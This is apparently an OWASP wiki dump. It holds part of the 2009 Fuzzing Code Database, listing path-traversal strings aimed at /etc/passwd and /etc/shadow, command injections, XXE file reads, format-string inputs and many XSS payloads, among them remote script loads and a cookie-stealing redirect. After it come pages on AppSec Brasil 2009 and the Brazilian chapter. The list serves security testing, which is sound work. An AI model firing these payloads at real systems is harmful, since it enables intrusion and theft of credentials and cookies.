%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%68%74%61%63%63%65%73%73
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
../../../../../../../../../../../../etc/hosts%00
../../../../../../../../../../../../etc/hosts
../../boot.ini
/../../../../../../../../%2A
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../etc/shadow
/../../../../../../../../../../etc/passwd^^
/../../../../../../../../../../etc/shadow^^
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/shadow
/./././././././././././etc/passwd
/./././././././././././etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\passwd
\..\..\..\..\..\..\..\..\..\..\etc\shadow
..\..\..\..\..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\..\..\..\etc\shadow
/..\../..\../..\../..\../..\../..\../etc/passwd
/..\../..\../..\../..\../..\../..\../etc/shadow
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
%0a/bin/cat%20/etc/passwd
%0a/bin/cat%20/etc/shadow
%00/etc/passwd%00
%00/etc/shadow%00
%00../../../../../../etc/passwd
%00../../../../../../etc/shadow
/../../../../../../../../../../../etc/passwd%00.jpg
/../../../../../../../../../../../etc/passwd%00.html
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
\\'/bin/cat%20/etc/passwd\\'
\\'/bin/cat%20/etc/shadow\\'
../../../../../../../../conf/server.xml
/../../../../../../../../bin/id|
C:/inetpub/wwwroot/global.asa
C:\inetpub\wwwroot\global.asa
C:/boot.ini
C:\boot.ini
../../../../../../../../../../../../localstart.asp%00
../../../../../../../../../../../../localstart.asp
../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../boot.ini
/./././././././././././boot.ini
/../../../../../../../../../../../boot.ini%00
/../../../../../../../../../../../boot.ini
/..\../..\../..\../..\../..\../..\../boot.ini
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
\..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\boot.ini
/../../../../../../../../../../../boot.ini%00.html
/../../../../../../../../../../../boot.ini%00.jpg
/.../.../.../.../.../
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
</pre>
''Sorry for breaking the layout - but "breaking the layout" could become "breaking the software".''

=== XSS Statements - Most effective/most common statements ===

Testing Statements
<pre>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
</pre>

Common exploit code (covers a lot of XSS vulnerabilities)
<pre>
'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt='
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt="
\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\'
'); alert('xss'); var x='
\\'); alert(\'xss\');var x=\'
//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));
</pre>

=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162)

<pre>
Statements
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
"<IMG SRC=""javascript:alert('XSS');"">"
<IMG SRC=JaVaScRiPt:alert('XSS')>
"<IMG SRC=javascript:alert(""XSS"")>"
"<IMG SRC=`javascript:alert(""RSnake says, 'XSS'"")`>"
"<IMG """"""><SCRIPT>alert(""XSS"")</SCRIPT>"">"
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
"<IMG SRC=""jav"
"ascript:alert('XSS');"">"
"perl -e 'print ""<IMG SRC=java\0script:alert(\""XSS\"")>"";' > out"
"perl -e 'print ""<SCR\0IPT>alert(\""XSS\"")</SCR\0IPT>"";' > out"
"<IMG SRC=""  javascript:alert('XSS');"">"
"<SCRIPT/XSS SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(""XSS"")>"
"<SCRIPT/SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<<SCRIPT>alert(""XSS"");//<</SCRIPT>"
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<SCRIPT SRC=//ha.ckers.org/.j>
"<IMG SRC=""javascript:alert('XSS')"""
<iframe src=http://ha.ckers.org/scriptlet.html <
<SCRIPT>a=/XSS/\nalert(a.source)</SCRIPT>
"\"";alert('XSS');//"
"</TITLE><SCRIPT>alert(""XSS"");</SCRIPT>"
"<INPUT TYPE=""IMAGE"" SRC=""javascript:alert('XSS');"">"
"<BODY BACKGROUND=""javascript:alert('XSS')"">"
<BODY ONLOAD=alert('XSS')>
"<IMG DYNSRC=""javascript:alert('XSS')"">"
"<IMG LOWSRC=""javascript:alert('XSS')"">"
"<BGSOUND SRC=""javascript:alert('XSS');"">"
"<BR SIZE=""&{alert('XSS')}"">"
"<LAYER SRC=""http://ha.ckers.org/scriptlet.html""></LAYER>"
"<LINK REL=""stylesheet"" HREF=""javascript:alert('XSS');"">"
"<LINK REL=""stylesheet"" HREF=""http://ha.ckers.org/xss.css"">"
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
"<META HTTP-EQUIV=""Link"" Content=""<http://ha.ckers.org/xss.css>; REL=stylesheet"">"
"<STYLE>BODY{-moz-binding:url(""http://ha.ckers.org/xssmoz.xml#xss"")}</STYLE>"
"<XSS STYLE=""behavior: url(xss.htc);"">"
"<STYLE>li {list-style-image: url(""javascript:alert('XSS')"");}</STYLE><UL><LI>XSS"
"<IMG SRC='vbscript:msgbox(""XSS"")'>"
¼script¾alert(¢XSS¢)¼/script¾
"<META HTTP-EQUIV=""refresh"" CONTENT=""0;url=javascript:alert('XSS');"">"
"<META HTTP-EQUIV=""refresh"" CONTENT=""0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"">"
"<META HTTP-EQUIV=""refresh"" CONTENT=""0; URL=http://;URL=javascript:alert('XSS');"">"
"<IFRAME SRC=""javascript:alert('XSS');""></IFRAME>"
"<FRAMESET><FRAME SRC=""javascript:alert('XSS');""></FRAMESET>"
"<TABLE BACKGROUND=""javascript:alert('XSS')"">"
"<TABLE><TD BACKGROUND=""javascript:alert('XSS')"">"
"<DIV STYLE=""background-image: url(javascript:alert('XSS'))"">"
"<DIV STYLE=""background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"">"
"<DIV STYLE=""background-image: url(javascript:alert('XSS'))"">"
"<DIV STYLE=""width: expression(alert('XSS'));"">"
"<STYLE>@im\port'\ja\vasc\ript:alert(""XSS"")';</STYLE>"
"<IMG STYLE=""xss:expr/*XSS*/ession(alert('XSS'))"">"
"<XSS STYLE=""xss:expression(alert('XSS'))"">"
"exp/*<A STYLE='no\xss:noxss(""*//*"");xss:ex/*XSS*//*/*/pression(alert(""XSS""))'>"
"<STYLE TYPE=""text/javascript"">alert('XSS');</STYLE>"
"<STYLE>.XSS{background-image:url(""javascript:alert('XSS')"");}</STYLE><A CLASS=XSS></A>"
"<STYLE type=""text/css"">BODY{background:url(""javascript:alert('XSS')"")}</STYLE>"

"<BASE HREF=""javascript:alert('XSS');//"">"
"<OBJECT TYPE=""text/x-scriptlet"" DATA=""http://ha.ckers.org/scriptlet.html""></OBJECT>"
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
"<EMBED SRC=""http://ha.ckers.org/xss.swf"" AllowScriptAccess=""always""></EMBED>"
"<EMBED SRC=""data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="" type=""image/svg+xml"" AllowScriptAccess=""always""></EMBED>"
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
"<XML ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<XML ID=""xss""><I><B><IMG SRC=""javascript:alert('XSS')""></B></I></XML><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN>"
"<XML SRC=""xsstest.xml"" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<HTML><BODY><?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time""><?import namespace=""t"" implementation=""#default#time2""><t:set attributeName=""innerHTML"" to=""XSS<SCRIPT DEFER>alert(""XSS"")</SCRIPT>""></BODY></HTML>"
"<SCRIPT SRC=""http://ha.ckers.org/xss.jpg""></SCRIPT>"
""
"<? echo('<SCR)';echo('IPT>alert(""XSS"")</SCRIPT>'); ?>"
"<META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=<SCRIPT>alert('XSS')</SCRIPT>"">"
"<HEAD><META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""text/html; charset=UTF-7""> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-"
"<SCRIPT a="">"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT ="">"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT a="">"" '' SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT ""a='>'"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT a=`>` SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT a="">'>"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT>document.write(""<SCRI"");</SCRIPT>PT SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<A HREF=""http://66.102.7.147/"">XSS</A>"
"<A HREF=""http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D"">XSS</A>"
"<A HREF=""http://1113982867/"">XSS</A>"
"<A HREF=""http://0x42.0x0000066.0x7.0x93/"">XSS</A>"
"<A HREF=""http://0102.0146.0007.00000223/"">XSS</A>"
"<A HREF=""h\ntt\tp://6"
"<A HREF=""//www.google.com/"">XSS</A>"
"<A HREF=""//google"">XSS</A>"
"<A HREF=""http://google.com/"">XSS</A>"
"<A HREF=""http://www.google.com./"">XSS</A>"
"<A HREF=""javascript:document.location='http://www.google.com/'"">XSS</A>"
"<A HREF=""http://www.gohttp://www.google.com/ogle.com/"">XSS</A>"
"<div onmouseover=""document.write(""XSS-XSS-XSS"");"">"
"<img src=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<input type=""image"" dynsrc=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<bgsound src=""javascript:document.write(""XSS-XSS-XSS"");"">"
"&{document.write(""XSS-XSS-XSS"");};"
"<img src=&{document.write(""XSS-XSS-XSS"");};>"
"<link rel=""stylesheet"" href=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<iframe src=""vbscript:document.write(""XSS-XSS-XSS"");"">"
"<img src=""livescript:document.write(""XSS-XSS-XSS"");"">"
"<a href=""about:<script>document.write(""XSS-XSS-XSS"");</script>"">"
"<meta http-equiv=""refresh"" content=""0;url=javascript:document.write(""XSS-XSS-XSS"");"">"
"<body onload=""document.write(""XSS-XSS-XSS"");"">"
"<div style=""background-image: url(javascript:document.write(""XSS-XSS-XSS""););"">"
"<div style=""behaviour: url([link to code]);"">"
"<div style=""binding: url([link to code]);"">"
"<div style=""width: expression(document.write(""XSS-XSS-XSS""););"">"
"<style type=""text/javascript"">document.write(""XSS-XSS-XSS"");</style>"
"<object classid=""clsid:..."" codebase=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<style></script>"
"<![CDATA[</script>"
"<<script>document.write(""XSS-XSS-XSS"");</script>"
"<img src=""blah""onmouseover=""document.write(""XSS-XSS-XSS"");"">"
"<img src=""blah>"" onmouseover=""document.write(""XSS-XSS-XSS"");"">"
"<div datafld=""b"" dataformatas=""html"" datasrc=""#X""></div>"
"<a href=""javascript#document.write(""XSS-XSS-XSS"");"">"
"<img dynsrc=""javascript:document.write(""XSS-XSS-XSS"");"">"
"&<script>document.write(""XSS-XSS-XSS"");</script>"
"<img src=""mocha:document.write(""XSS-XSS-XSS"");"">"
"<div style=""binding: url([link to code]);""> [Mozilla]"
"<script>document.write(""XSS-XSS-XSS"");</script>"
"<xml src=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<xml id=""X""><a><b><script>document.write(""XSS-XSS-XSS"");</script>;</b></a></xml>"
"[\xC0][\xBC]script>document.write(""XSS-XSS-XSS"");[\xC0][\xBC]/script>"
><script>
"<script>alert(""WXSS"")</script>"
"<<script>alert(""WXSS"");//<</script>"
<script>alert(document.cookie)</script>
'><script>alert(document.cookie)</script>
'><script>alert(document.cookie);</script>
"%3cscript%3ealert(""WXSS"");%3c/script%3e"
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
&ltscript&gtalert(document.cookie);</script>
&ltscript&gtalert(document.cookie);&ltscript&gtalert
<xss><script>alert('WXSS')</script></vulnerable>
<IMG%20SRC='javascript:alert(document.cookie)'>
"<IMG%20SRC=""javascript:alert('WXSS');"">"
"<IMG%20SRC=""javascript:alert('WXSS')"""
<IMG%20SRC=JaVaScRiPt:alert('WXSS')>
<IMG%20SRC=javascript:alert("WXSS")>
"<IMG%20SRC=`javascript:alert(""'WXSS'"")`>"
"<IMG%20""""""><SCRIPT>alert(""WXSS"")</SCRIPT>"">"
<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG%20SRC='javasc
"<IMG%20SRC=""jav"
"<IMG%20SRC=""jav	ascript:alert('WXSS');"">"
"<IMG%20SRC=""jav
ascript:alert('WXSS');"">"
"<IMG%20SRC=""javascript:alert('WXSS');"">"
"<IMG%20SRC=""%20%20javascript:alert('WXSS');"">"
"<IMG%20DYNSRC=""javascript:alert('WXSS')"">"
"<IMG%20LOWSRC=""javascript:alert('WXSS')"">"
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
<IMG%20SRC=javascript:alert('XSS')>
<IMG%20SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG%20SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
"><script>document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie</script>
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
'';!--<XSS>=&{()}"
</pre>

=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15) ===

<pre>
Statements
count(/child::node())
x' or name()='username' or 'x'='y
<name>','')); phpinfo(); exit;/*</name>
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:/boot.ini"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/shadow"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
"<xml ID=""xss""><I><B><IMG SRC=""javascript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
</pre>

=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28)===

<pre>
%s%p%x%d
.1024d
%.2049d
%p%p%p%p
%x%x%x%x
%d%d%d%d
%s%s%s%s
%99999999999s
%08x
%%20d
%%20n
%%20x
%%20s
%s%s%s%s%s%s%s%s%s%s
%p%p%p%p%p%p%p%p%p%p
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
f(x)=%s x 123
f(x)=%x x 255
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
XXXXX.%p
XXXXX`perl -e 'print ".%p" x 80'`
`perl -e 'print ".%p" x 80'`%n
%08x.%08x.%08x.%08x.%08x\n
XXX0_%08x.%08x.%08x.%08x.%08x\n
%.16705u%2\$hn
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id > /tmp/file; exit;
</pre>

==== Project Contributor ====
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']]

Reviewer: [[:User:eneves|'''Eduardo Neves''']]

Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']]

==== Feedback and Participation ====

We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org

[[Category:OWASP Project|Fuzzing Code Database]]
[[Category:OWASP Document]]
[[Category:OWASP Alpha Quality Document]]
__NOTOC__
<headertabs/>

Category:OWASP Fuzzing Code Database

2009-08-11T19:27:12Z

AppSec Brasil 2009

2009-05-04T18:43:13Z

Wagner.elias: /* Conference Committee */

'''Para a versão em português, veja em [[AppSec Brasil 2009 (pt-br)]]'''

Welcome to the OWASP Application Security Brasil Conference! After successful OWASP Conferences in the United States and Europe, we are now in Brazil in October 2009!

[[Image:Brasilia Panorama.jpg]]

With support from [http://www.ticontrole.gov.br TI-Controle] and the Computing Centre of the [http://www.camara.gov.br Deputy Chamber], OWASP will hold in October the first Brazilian Application Security conference in [http://en.wikipedia.org/wiki/Brasília Brasilia, Capital of Brazil]. The Conference consists of two days of training sessions, followed by a two-day conference on a single track.

==Conference Location==

'''Brasília, Brazil.'''

==Call for Presentations / Research Papers==

To be defined

==Call for Training Provider==

To be defined

==Agenda and Presentations ==

Please see the Portuguese version of this page at [[AppSec Brasil 2009 (pt-br)]]

==Venue==

[[Image:CongressoNacional.jpg|The Palácio do Congresso building]]

The event will be held in Brasília, Brazil's Capital at: Câmara dos Deputados, Anexo II, Praça dos Três Poderes.

You can check the location at [http://maps.google.com/maps?f=q&source=s_q&hl=pt-BR&geocode=&q=anexo+II,+camara+dos+deputados,+brasilia&sll=37.0625,-95.677068&sspn=43.934478,79.101563&ie=UTF8&t=h&ll=-15.800058,-47.865822&spn=0.01309,0.019312&z=16 Google Maps]

==Registration==

Will be available soon.

==Tutorial Days - October 27-28==

OWASP will host numerous 1 and 2 day tutorial sessions prior to the conference. If you are interested in delivering a tutorial at this event, please contact [mailto:eduardo.neves@owasp.org Eduardo Neves].

==Accommodations==

To be defined

==Transportation to the Conference==

To be defined

===How to get to the venue?===

To be defined

==Registration and Conference Fees==

There will be no fees for this conference, only '''registration''' is required to participate.

==Conference Committee==

OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org

2009 AppSec CPLP Program Committee:
* Conference Chair: Lucas C. Ferreira (contato at sapao.net)
* Tutorials Organization: Eduardo V. C. Neves (eduardo.neves at owasp.org)
* Tracks Organization: Wagner Elias (wagner.elias at owasp.org)

Pre-Event Organization Team

* Cassio Goldschmidt (cassio 'at' owasp.org)
* Kuai Hinojosa (kuai.hinojosa 'at' owasp.org)
* Leonardo Cavallari - (email)
* Thiago Lechuga (thiagoalz 'at' gmail.com)

Event Organization Team

==[[OWASP AppSec Conference Sponsors | Conference Sponsors]]==

This conference will be sponsored by the [http://www2.camara.gov.br/english Center for Information Technology of the Brazilian Deputy Chamber]

[[Category:OWASP AppSec Conference]]

Brazilian

2009-05-04T16:47:22Z

Wagner.elias: /* AppSec Brazil 2009 */

{{Chapter Template|chaptername=Brazilian|extra=The chapter leader is [mailto:wagner.elias@gmail.com Wagner Elias] |mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-brazilian|emailarchives=http://lists.owasp.org/pipermail/owasp-brazilian}}

<paypal>Brazil</paypal>

== Novidades do Capítulo ==

=== AppSec Brazil 2009 ===

O Chapter Brazil do OWASP estará realizando o primeiro App Sec Brazil, este evento será apoiado pela Câmara de Deputados do Brasil. Saiba mais sobre o evento [http://www.owasp.org/index.php/AppSec_Brasil_2009_(pt-br)/ aqui].

=== PHP Conference 2008 ===

O Chapter Brazil do OWASP estará no evento PHP Conference Brasil 08, com expectativa de atingir cerca de 1.000 profissionais participantes e será realizado no UNIFIEO, Universidade localizada no Município de Osasco, São Paulo.

O nosso Chapter Leader, Wagner Elias, irá apresentar a palestra “Tratando as vulnerabilidades do Top 10 da OWASP”, no dia 28/11 das 9h00 às 10h30 na sala AT2 - Amarelo. Além disso, ele irá representar o Chapter Brazil do OWASP na solenidade de abertura do evento, que irá ocorrer no dia 29/11. Saiba mais sobre o evento [http://phpconf.com.br/ aqui].

=== OWASP EU Summit 2008 ===

Caros,

O OWASP EU Summit 2008 será apresentado em Portugal entre os dias 3 e 7 de novembro de 2008, e como responsável pela formação da grade de treinamentos, gostaria de convidar os interessados em ministrar cursos de IT Security a entrarem em contato comigo para maiores detalhes.

Todos os cursos deverão ser apresentados em inglês, são remunerados e incluem a participação do instrutor nas demais seções do EU Summit.

Informações sobre o evento estão disponíveis em: https://www.owasp.org/index.php/OWASP_EU_Summit_2008.

Atenciosamente,

'''Eduardo Vianna de Camargo Neves, CISSP'''

Conviso IT Security, Operations Manager

T. 55 (41) 3075.3080 | M. 55 (41) 9941.0825

eneves (at) conviso.com.br

=== SoC 2008 - Projetos Aprovados ===

Duas propostas submetidas por membros do capítulo foram aprovadas na temporada [[OWASP Summer of Code 2008]]. São elas:

'''[[:Category:OWASP Positive Security Project|Positive Security Project]] - por Eduardo Camargo Neves''': modificar a perspectiva adotada pelas empresas ao se tratar de aplicações por uma abordagem positiva.

'''[[OWASP ASDR Project]] - por [mailto:leonardocavallari(at)gmail.com Leonardo Cavallari]''': visa criar o guia de referência mais completo sobre segurança em aplicações Web, incluindo [[ASDR TOC Principles|Princípios]],[[ASDR TOC Threat Agents|Agentes de ameaças]], [[ASDR TOC Vulnerabilities|Vulnerabilidades]], [[ASDR TOC Attacks|Ataques]], [[ASDR TOC Control|Controles]], [[ASDR TOC Technical Impacts|Impactos Técnicos]] e de [[ASDR TOC Business Impacts|Negócio]].

Estamos precisando de voluntários! Entre em contato com os líderes dos projetos para saber como contribuir!!

=== Tradução da ferramenta WebGoat ===
O [[OWASP WebGoat Project|WebGoat]], projeto mantido pela OWASP é uma aplicação J2EE elaborada com diversas falhas propositais para ser utilizada como ferramenta de apresendizado.
[http://softwareseguro.blogspot.com Fabrício Braz] realizou a tradução da ferramenta possibilitando melhor entendimento das lições oferecidas.

Faça o download da versão em português [http://code.google.com/p/webgoat-ptbr/downloads/list aqui].

=== Tradução OWASP TOP10 ===
O Capítulo Brasil, por meio de seus voluntários, concluiu a tradução do OWASP TOP 10 2007, documento que reúne as 10 vulnerabilidades mais críticas em aplicações WEB. [http://www.owasp.org/images/4/42/OWASP_TOP_10_2007_PT-BR.pdf Acesse o documento] e já comece a validar suas aplicações!

Agradeço o comprometimento de todos envolvidos no projeto: [mailto:clebber@gmail.com Cleber Brandão “Clebeer”], [mailto:fabricio.braz@gmail.com Fabricio Ataides Braz], [mailto:deigratia33@gmail.com Marcos Aurélio Rodrigues], [mailto:mykesh@gmail.com Myke Hamada], [mailto:spooker@gmail.com Rodrigo Montoro “Sp0oKer”].

[mailto:leonardocavallari@gmail.com Leonardo Cavallari] - Organizador e Responsável pela tradução

== Eventos ==
=== Apresentação sobre o OWASP e projeto TOP 10 @ ISSA Day - Capítulo Brasil/SP ===
Introdução sobre o projeto OWASP e TOP10 apresentado aos participantes do ISSA Day/Brasil em Junho/2008, por Leonardo Cavallari.

Download das apresentações pode ser feito nos links abaixo:

Parte I - [http://www.owasp.org/images/b/b4/OWASP-Intro-2008-pt-br.ppt Introdução OWASP]

